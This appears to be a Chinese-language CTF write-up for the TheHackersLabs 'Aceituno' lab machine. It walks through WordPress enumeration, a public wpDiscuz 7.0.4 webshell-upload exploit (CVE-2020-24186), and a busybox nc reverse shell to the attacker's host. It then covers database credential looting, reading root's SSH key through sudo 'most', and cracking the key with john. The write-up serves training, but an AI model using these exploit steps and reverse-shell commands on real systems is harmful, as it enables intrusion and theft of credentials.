TheHackersLabs-Aceituno靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.156  08:00:27:df:bb:e7       (Unknown)
192.168.60.254  00:50:56:e0:e6:12       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.951 seconds (131.21 hosts/sec). 4 responded
❯ export ip=192.168.60.156
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.156:22
Open 192.168.60.156:80
Open 192.168.60.156:443
Open 192.168.60.156:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 22:28 CST
Initiating ARP Ping Scan at 22:28
Scanning 192.168.60.156 [1 port]
Completed ARP Ping Scan at 22:28, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:28
Completed Parallel DNS resolution of 1 host. at 22:28, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:28
Scanning 192.168.60.156 [4 ports]
Discovered open port 3306/tcp on 192.168.60.156
Discovered open port 443/tcp on 192.168.60.156
Discovered open port 22/tcp on 192.168.60.156
Discovered open port 80/tcp on 192.168.60.156
Completed SYN Stealth Scan at 22:28, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.156
Host is up, received arp-response (0.00081s latency).
Scanned at 2025-01-16 22:28:46 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
443/tcp  open  https   syn-ack ttl 64
3306/tcp open  mysql   syn-ack ttl 64
MAC Address: 08:00:27:DF:BB:E7 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

访问80端口跳转域名，编辑一下hosts

❯ sudo vim /etc/hosts
192.168.60.156  aceituno.thl

浏览器访问一下，发现是wordpress站点

wpscan扫一下，发现两个用户aceituno Aceituno

❯ wpscan --url http://aceituno.thl -e u,ap --api-token "换成自己的API"
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://aceituno.thl/ [192.168.60.156]
[+] Started: Thu Jan 16 22:43:18 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.59 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://aceituno.thl/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://aceituno.thl/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://aceituno.thl/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://aceituno.thl/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5.2 identified (Insecure, released on 2024-04-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://aceituno.thl/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>
 |  - http://aceituno.thl/comments/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>
 |
 | [!] 3 vulnerabilities identified:
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
 |     Fixed in: 6.5.5
 |     References:
 |      - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
 |     Fixed in: 6.5.5
 |     References:
 |      - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
 |     Fixed in: 6.5.5
 |     References:
 |      - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/

[+] WordPress theme in use: blogxo
 | Location: http://aceituno.thl/wp-content/themes/blogxo/
 | Last Updated: 2024-05-28T00:00:00.000Z
 | Readme: http://aceituno.thl/wp-content/themes/blogxo/readme.txt
 | [!] The version is out of date, the latest version is 0.5
 | Style URL: http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2
 | Style Name: Blogxo
 | Style URI: https://themeansar.com/free-themes/blogxo/
 | Description: Blogxo is a fast, clean, modern-looking Best Responsive News Magazine WordPress theme. The theme is ...
 | Author: Themeansar
 | Author URI: https://themeansar.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2, Match: 'Version: 0.4'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <> (0 / 10)  0.00%  ETA: ??:??:? Brute Forcing Author IDs - Time: 00:00:00 <> (1 / 10) 10.00%  ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (2 / 10) 20.00%  ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (5 / 10) 50.00%  ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (6 / 10) 60.00%  ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] aceituno
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://aceituno.thl/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Sitemap (Aggressive Detection)
 |   - http://aceituno.thl/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Aceituno
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 20

[+] Finished: Thu Jan 16 22:43:25 2025
[+] Requests Done: 55
[+] Cached Requests: 8
[+] Data Sent: 13.953 KB
[+] Data Received: 419.225 KB
[+] Memory used: 272.965 MB
[+] Elapsed time: 00:00:06

WP插件扫描

我尝试了爆破用户名，无果，再次扫描一下，插件扫描模式改成主动，就是扫的会很慢，我花了半小时扫描

❯ wpscan --url http://aceituno.thl -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://aceituno.thl/ [192.168.60.156]
[+] Started: Thu Jan 16 23:13:02 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.59 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://aceituno.thl/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://aceituno.thl/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://aceituno.thl/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://aceituno.thl/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5.2 identified (Insecure, released on 2024-04-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://aceituno.thl/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>
 |  - http://aceituno.thl/comments/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>

[+] WordPress theme in use: blogxo
 | Location: http://aceituno.thl/wp-content/themes/blogxo/
 | Last Updated: 2024-05-28T00:00:00.000Z
 | Readme: http://aceituno.thl/wp-content/themes/blogxo/readme.txt
 | [!] The version is out of date, the latest version is 0.5
 | Style URL: http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2
 | Style Name: Blogxo
 | Style URI: https://themeansar.com/free-themes/blogxo/
 | Description: Blogxo is a fast, clean, modern-looking Best Responsive News Magazine WordPress theme. The theme is ...
 | Author: Themeansar
 | Author URI: https://themeansar.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2, Match: 'Version: 0.4'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:36:11 <==================================================================> (108632 / 108632) 100.00% Time: 00:36:11
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://aceituno.thl/wp-content/plugins/akismet/
 | Latest Version: 5.3.5
 | Last Updated: 2024-11-19T02:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://aceituno.thl/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] feed
 | Location: http://aceituno.thl/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://aceituno.thl/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wpdiscuz
 | Location: http://aceituno.thl/wp-content/plugins/wpdiscuz/
 | Last Updated: 2024-10-14T17:02:00.000Z
 | Readme: http://aceituno.thl/wp-content/plugins/wpdiscuz/readme.txt
 | [!] The version is out of date, the latest version is 7.6.27
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://aceituno.thl/wp-content/plugins/wpdiscuz/, status: 200
 |
 | Version: 7.0.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://aceituno.thl/wp-content/plugins/wpdiscuz/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] aceituno
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://aceituno.thl/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Sitemap (Aggressive Detection)
 |   - http://aceituno.thl/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Aceituno
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Jan 16 23:49:21 2025
[+] Requests Done: 108675
[+] Cached Requests: 40
[+] Data Sent: 29.076 MB
[+] Data Received: 30.515 MB
[+] Memory used: 482.766 MB
[+] Elapsed time: 00:36:19

Poc利用

发现插件wpdiscuz版本为7.0.4，网上搜寻有该版本RCE的Poc利用

这是个评论的插件，可以远程上传任何文件

hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE: wpDiscuz 7.0.4 Remote Code Execution

尝试利用一下

❯ git clone https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE.git
Cloning into 'CVE-2020-24186-wpDiscuz-7.0.4-RCE'...
remote: Enumerating objects: 34, done.
remote: Counting objects: 100% (34/34), done.
remote: Compressing objects: 100% (31/31), done.
remote: Total 34 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (34/34), 154.43 KiB | 237.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
❯ cd CVE-2020-24186-wpDiscuz-7.0.4-RCE
❯ python3 wpDiscuz_RemoteCodeExec.py -u http://aceituno.thl -p /2024/04/23/hola-mundo
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
---------------------------------------------------------------

[+] Response length:[97732] | code:[200]
[!] Got wmuSecurity value: 27b9b4f615
[!] Got wmuSecurity value: 1

[+] Generating random name for Webshell...
[!] Generated webshell name: wkjyxbtkicuaczw

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:http://aceituno.thl/wp-content/uploads/2025/01/wkjyxbtkicuaczw-1737043183.5437.php

> id


uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功拿到Shell

这里不太好操作，我反弹一个shell

拿到一个用户aceituno

> busybox nc 192.168.60.100 4444 -e sh
--------------分隔-----------------------
❯ pwncat-cs -lp 4444
[00:01:10] Welcome to pwncat 🐈!                             __main__.py:164
[00:01:36] received connection from 192.168.60.156:42742          bind.py:84
[00:01:36] 0.0.0.0:4444: upgrading from /usr/bin/dash to      manager.py:957
           /usr/bin/bash
[00:01:37] 192.168.60.156:42742: registered new host w/ db    manager.py:957
(local) pwncat$
(remote) www-data@Aceituno:/var/www$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
aceituno:x:1000:1000:aceituno,,,:/home/aceituno:/bin/bash

本地开放3306端口，不过不知道密码

看下Wordpress配置文件，连一下数据库

(remote) www-data@Aceituno:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wp_user' );

/** Database password */
define( 'DB_PASSWORD', 'Tomamoreno' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'e*Ouzl9IQttH;rTl{Cxgr7_1C.OFKuq#(| Y8uRwIS?]l;k?pFivUzO^~NAvxk)L' );
define( 'SECURE_AUTH_KEY',  'PK;>d&ltu$Hq5F$EfH2 <_]3&cm>;@J}sy/pFBrthS-r*(&|^Lj:k&5^8yv9rdAk' );
define( 'LOGGED_IN_KEY',    ')~){g24dF!5BSI[<u[|}k6z yrz85/%t$jvMU$v%xhuj<!4(;n`KG|@1hazNGl{.' );
define( 'NONCE_KEY',        '&)]3#r1f3oo{9taKv9+/fV)sO!7L3LUU#^`Ht1>OUU31|ae>HxZpuKCBVu1V,$1L' );
define( 'AUTH_SALT',        'akQnq #ZcubeXF9[S-)8[)j&EO7M4-^&=j%HPk`5#gr9-zfB#1n(H/hR_QH>>hQN' );
define( 'SECURE_AUTH_SALT', 'ft:Uy;O8$A>?%aPbjgEak;%V9:j]3?YDRM}{0m<ts),J&2O#XD`y/]n~tG-aRn^t' );
define( 'LOGGED_IN_SALT',   'H4J3weFe|i#SD2}@FjuBdfYJ+8V&i!1Uasrv7bW,(o-Kg||^cY0~;i?Ap{ur^Pde' );
define( 'NONCE_SALT',       '&[PO4V~#JDGLR&Yk]^fCWh;V0A/+fTSB}_;KvTzuUF1Y;1u1#Bdyr^NrDgqwBi:.' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

(remote) www-data@Aceituno:/var/www/html/wordpress$ mysql -u wp_user -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 169683
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------------+
| Tables_in_wordpress         |
+-----------------------------+
| pelopicopata                |
| wp_commentmeta              |
| wp_comments                 |
| wp_gwolle_gb_entries        |
| wp_gwolle_gb_log            |
| wp_links                    |
| wp_options                  |
| wp_postmeta                 |
| wp_posts                    |
| wp_term_relationships       |
| wp_term_taxonomy            |
| wp_termmeta                 |
| wp_terms                    |
| wp_usermeta                 |
| wp_users                    |
| wp_wc_avatars_cache         |
| wp_wc_comments_subscription |
| wp_wc_feedback_forms        |
| wp_wc_follow_users          |
| wp_wc_phrases               |
| wp_wc_users_rated           |
| wp_wc_users_voted           |
+-----------------------------+
22 rows in set (0.000 sec)

MariaDB [wordpress]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| Aceituno   | $P$BNyfR9lcn/QsR0fTPD3vUVkVUyg6AJ. |
+------------+------------------------------------+
1 row in set (0.000 sec)

拿到hash，爆破一下，没想到爆不出来

我忽略了一个数据表pelopicopata

MariaDB [wordpress]> show tables;
+-----------------------------+
| Tables_in_wordpress         |
+-----------------------------+
| pelopicopata                |
| wp_commentmeta              |
| wp_comments                 |
| wp_gwolle_gb_entries        |
| wp_gwolle_gb_log            |
| wp_links                    |
| wp_options                  |
| wp_postmeta                 |
| wp_posts                    |
| wp_term_relationships       |
| wp_term_taxonomy            |
| wp_termmeta                 |
| wp_terms                    |
| wp_usermeta                 |
| wp_users                    |
| wp_wc_avatars_cache         |
| wp_wc_comments_subscription |
| wp_wc_feedback_forms        |
| wp_wc_follow_users          |
| wp_wc_phrases               |
| wp_wc_users_rated           |
| wp_wc_users_voted           |
+-----------------------------+
22 rows in set (0.000 sec)

MariaDB [wordpress]> select * from  pelopicopata;
+----------+------------------+
| usuario  | contrasea       |
+----------+------------------+
| aceituno | ElSeorDeLaNoche |
+----------+------------------+
1 row in set (0.000 sec)

终于拿到密码了,结果半天也登不上去

看了WP才知道这个密码是个西班牙语

不知道为啥msql查询出来不显示这个特殊符号

ElSeñorDeLaNoche

❯ ssh aceituno@$ip
aceituno@192.168.60.156's password:
Permission denied, please try again.
aceituno@192.168.60.156's password:
Linux Aceituno 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 28 12:09:03 2024 from 192.168.0.108
aceituno@Aceituno:~$ cat user.txt
f6cf451a8f0f8c14fd0a54e08b99b69c

Root提权

文件读取

用户有sudo权限

aceituno@Aceituno:~$ sudo -l
Matching Defaults entries for aceituno on Aceituno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User aceituno may run the following commands on Aceituno:
    (root) NOPASSWD: /usr/bin/most

我查询了most的利用方法，我原以为可以执行命令的，结果并不能

most 是一个在 Unix 和类 Unix 系统中常用的程序，它是一个分页器，用于查看文件内容。与 less 类似，most 允许用户逐页查看文件内容，而不是一次性将所有内容打印到屏幕上。通过 most，你可以方便地查看长文件或命令输出，而无需一次性加载整个文件，帮助节省内存和提高效率。

不过我在root根目录下发现了私钥文件

aceituno@Aceituno:~$ sudo /usr/bin/most /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAqVNwfIr
sulKah6wYV7i/NAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZLjoCWvQ
XxRgojyRlr6GA6GdrtRBwD5Z5tB7JvdrT2AE0G0uTCcCsaeFEzkPzIehiTSCM74Qra0IFB
Z9oD24zqoiCb7i2fyx1x4lhhL8ioVkLS4qgwFqidxyCe0lG5rfiNIT7pbtoVrB293lTi59
gXDwdKLqbp93X1/jqde768qLn8UtxKIB/paoIHSvzOicYbbLWVmwzO89kk40+pYe/P0Cm4
ZgoxvSNabx46MhposoX5JNKMiIxEuo9EUF9RRWfagULvqOfjQ0Y1xZxudl9qnltr/nt1Yh
vtb3uKjuRBYxRMs1IOpEh3FsrWnxCBWZf+NPSduXARz2RJdGkVl3AAAD0Bo2dp5dV4571T
mpagumFHUfL6q98UCFzizXp87sYF3eSYDNayRN81WpBFA8Ot6j/9ezxJ02s6Pc9ALRkpfZ
KjqbnrFdqU6NRbsdACW+PegayJNHLauxXoRNAC76ixpHS6LySWA+37BpHw5FVz1h9rWBBt
uu4x3DDrmrUem2XsfHeU2lpCwnp9vQOjIZWXPj9/H1t2m4QR6oedEFKV6ymAt6NogGhLq/
rO0P4rrpO987GUPL4LyxddEIyGc3rX5p0drXT8OhS1qRIbWJQekIqwGVzYRdux7IHnTpr3
UbGhjJlwBzo6gC36pu0pGuZsfUTT9qNwF26/tR6ibyMMhFrk0cVVxh6ygD70E3tHdk/KpD
josGMXrAJ+W8yAdPAD1nWJjjhBz9jrBcQVS5VIJjrq8u/o8cNkd304RwFI66oFOMH4gxXW
V8v1qzweGnaGo1feTSjSZHv21I0TT3UECKL4IEXqOouG7MQ+UQyT7hNgau8+thBNj+glK0
FDyg+Qug0KT05ClURpCtZShlHEk6SnHzovXQqN5HbSPb2NiLDcX5MzngOLugLaMddDktyb
GD7BALPS4OIEIUe0CX3llsx4xEyfKT4bNrC+rx0HORcza5Xt90Wr7lBY86ROVOk5PAGje5
IH9V2EkxYpu2Vf1rqw+e659LRNHfsNQvaGj2gsG3PhhEH44SO9K9KHRFO3kMfNe/5DsAlX
Gnl27908uPhjtedhRJr0FiD++BdD7xXBmO/uN/Md61BoPv8w8u0V3FTkv1mCc9TDYhCL7b
gZyhBDa/5vmQ/bI3MOw9OSjwfl748Pl/vZ/gfJjuMDxurjGfeiuGuG5CfUgz3/SKmEw3GL
/LM25wG2EV6jkj3owhGCM69mVBDq1/ARLwzIRgB94OAP7z2uu24K774mN9sCJ/Q5A94op9
/Olvp6FDa8RqAcM9OyQhO/znemxeZgRHSmDV9Tol9/pgtKawJ6tzrymvu+ClvGc1naGDrq
xCQ53mBvTsMf22WgdD4NQcC95qRr3UEWMuG81r0brdqRyiyqgJXRcYg+xbGwioon5lEKAp
koyJSWpfJ+bE0GJQKD43LbCowEpbt2mBzcvjwMeZqQyUk3pQZl/5AAtwz7ErREbICMbJPT
1EKyZjSLvheWCoyxQ4T4ro/bvHQ7X0izWvMB2L5SBEnsXyjZRMibpdut1zm0JCVZmYCObA
WjMe4TFUoy5Jxa3N0jMgAVbxKoyKYo7O6wpcBlChpkHaAJMdMHN9Ystnm/xZukDw3C8fTl
PFMYhpuAN4oyQaZbBxHvrfaTxCeJs=
-----END OPENSSH PRIVATE KEY-----

爆破一下，ssh连接上去

❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blessed1         (id_rsa)
1g 0:00:00:47 DONE (2025-01-17 00:35) 0.02115g/s 42.65p/s 42.65c/s 42.65C/s melinda..jesusfreak
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh root@192.168.60.156 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux Aceituno 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 28 12:08:02 2024 from 192.168.0.108
root@Aceituno:~# cat root.txt
77750e200ff18510ec52276c8f654fe9

不过结束的时候我发现更方便的提权方案，你可以查阅most的官方帮助手册

[Ubuntu 手册页：most - 浏览或分页显示文本文件 — Ubuntu Manpage: most - browse or page through a text file](https://manpages.ubuntu.com/manpages/oracular/en/man1/most.1.html#command usage)

直接按e进入编辑文件，可能是调用了vim之类的文本编辑器，输入:!/bin/bash提权即可